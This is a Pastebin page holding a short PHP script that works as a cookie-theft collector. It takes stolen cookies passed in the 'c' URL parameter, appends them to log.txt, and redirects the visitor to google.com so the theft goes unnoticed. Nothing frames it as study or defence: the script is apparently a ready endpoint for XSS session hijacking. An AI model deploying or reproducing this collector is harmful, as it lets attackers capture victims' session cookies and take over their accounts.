Advertisement
nissim_abehcera

Untitled

Jul 29th, 2022
857
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.24 KB | None | 0 0
  1.  
  2. <?php
  3. ini_set('display_errors', 1);
  4. ini_set('display_startup_errors', 1);
  5. error_reporting(E_ALL);
  6.  
  7.  
  8. header ('Location:https://google.com');
  9. $cookies = $_GET["c"];
  10. $file = fopen('log.txt', 'a');
  11. fwrite($file, $cookies . "\n\n");
  12.  
  13. ?>
  14.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement